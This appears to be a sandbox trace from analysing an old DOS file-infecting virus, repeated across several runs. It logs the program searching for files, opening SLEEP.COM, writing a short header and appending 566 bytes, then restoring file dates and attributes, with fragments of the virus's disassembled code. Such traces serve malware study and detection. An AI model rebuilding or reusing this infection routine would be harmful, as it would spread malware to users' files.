2018-12-25T11:43:09.272344899Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.287348311Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.290084124Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.298526896Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.30495215Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.307465984Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.331085234Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.338112911Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.341201381Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.343601958Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.346038007Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.357519094Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.35965704Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.367624383Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.377247743Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.380254263Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.387029937Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.393552098Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.395733261Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.406858576Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.413530979Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.41634691Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.418869938Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.421630797Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.431075044Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.433911831Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.442376536Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.452528336Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.456266346Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.463236151Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.469744359Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.472130149Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.483095798Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.494905902Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.50169331Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.504565167Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.507291654Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.516084206Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.51874991Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.526879923Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.536736602Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.540487441Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.547508569Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.554010217Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.55692549Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.562460665Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.567295826Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.570468789Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.573050684Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.575772537Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.591004005Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.594369306Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.59645206Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.604062196Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.607631718Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.615022228Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.621731149Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.624995934Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.636134929Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.642928002Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.65079339Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.652386602Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.655003853Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.665649919Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.667450654Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.675294754Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.68614736Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.689089003Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.696900234Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.704999156Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.707131538Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.717196446Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.724909984Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.728301246Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.729996972Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.733504588Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.742310199Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.744176609Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.75273098Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.763258095Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.766167908Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.773634601Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.780992039Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.783071671Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.786437192Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:09.791673879Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:09.794127823Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.795608273Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:09.798717452Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:09.254152022Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:09.257424819Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:09.259510056Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.261028767Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.262584975Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:09.267460612Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:09.275307699Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:09.279534089Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:09.283908292Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:09.292953189Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:09.305804267Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.310777231Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:09.318393155Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:09.319738646Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:09.321699151Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:09.328308236Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:09.330060452Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:09.338726687Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.352792782Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.356879474Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.364218046Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.371570115Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.373812239Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.384840369Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.392026478Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.395160414Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.396605613Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.399078029Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.409193442Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.411414688Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.420379147Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.432288386Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.435665484Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.443448816Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.453184913Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.455265807Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.466469568Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.474120444Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.478061711Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.480902145Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.488042115Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.497338371Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.498933803Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.507501093Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.518979414Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.522054374Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.529482503Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.536507714Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.538582663Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.550238101Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.558074465Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.561252905Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.56274258Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.566215907Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.575506836Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.577533667Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.587249038Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.598809012Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.602192118Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.610653945Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.618892984Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.621365136Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.626637744Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.632855526Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.634861604Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.63610117Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.638243747Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.647418143Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.648568404Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.650352628Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.653227512Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.655025274Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.662009502Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.666210462Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.673312921Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.688141841Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.692428011Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.696735878Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.69819405Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.701115158Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.710962363Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.712796123Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.72247407Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.733634089Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.73694436Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.745140561Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.753237422Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.756050999Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.768546712Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.776246056Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.779656326Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.782309224Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.785924427Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.795744561Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.79767137Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.81519278Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.826966276Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.830409109Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.839387659Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.846995072Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.849476253Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.853547913Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:09.858616406Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:09.861487388Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.863964674Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:09.866306429Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:09.434927687Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:09.44422797Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:09.445789228Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.447498643Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.449316947Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:09.453053984Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:09.459324029Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:09.466083976Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:09.472841069Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:09.474582522Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:09.490213979Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.498333525Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:09.500995196Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:09.502281785Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:09.505310787Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:09.513879082Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:09.515377754Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:09.524122593Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.534036573Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.536653752Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.544807035Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.551546306Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.553291495Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.564986857Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.577467677Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.583810765Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.585773905Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.588313447Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.596401894Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.598005107Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.605890321Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.615863231Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.61884231Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.625657593Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.631954082Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.633608215Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.64434136Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.651119711Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.654126122Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.656189492Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.658748472Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.667281112Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.669625058Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.677459963Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.687605355Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.691754464Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.69841932Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.705260383Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.708293248Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.718566425Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.725357908Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.729205854Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.730903192Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.733590889Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.742931993Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.744776278Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.752505297Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.763218963Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.76647737Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.773880297Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.781058152Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.783546351Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.788090991Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.793119859Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.796944925Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.798619391Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.801291222Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.817940348Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.819626418Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.821326233Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.826860216Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.829724821Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.836317705Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.844184676Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.846224831Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.856162282Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.864847718Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.870951381Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.872284335Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.875097317Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.88392486Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.885340124Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.893481975Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.904192901Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.907064983Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.914702679Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.921379128Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.923403054Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.934319768Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.941349346Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.950513806Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.952286877Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.967131219Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.976119109Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.978005363Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.985867351Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.995615082Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.998426564Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.00596151Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:10.012408505Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:10.014701593Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:10.018578635Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:10.023047817Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:10.025469153Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:10.027238747Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:10.02917006Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:09.77840271Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:09.787364274Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:09.789116569Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.790229508Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.791426422Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:09.798604523Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:09.810194756Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:09.823451967Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
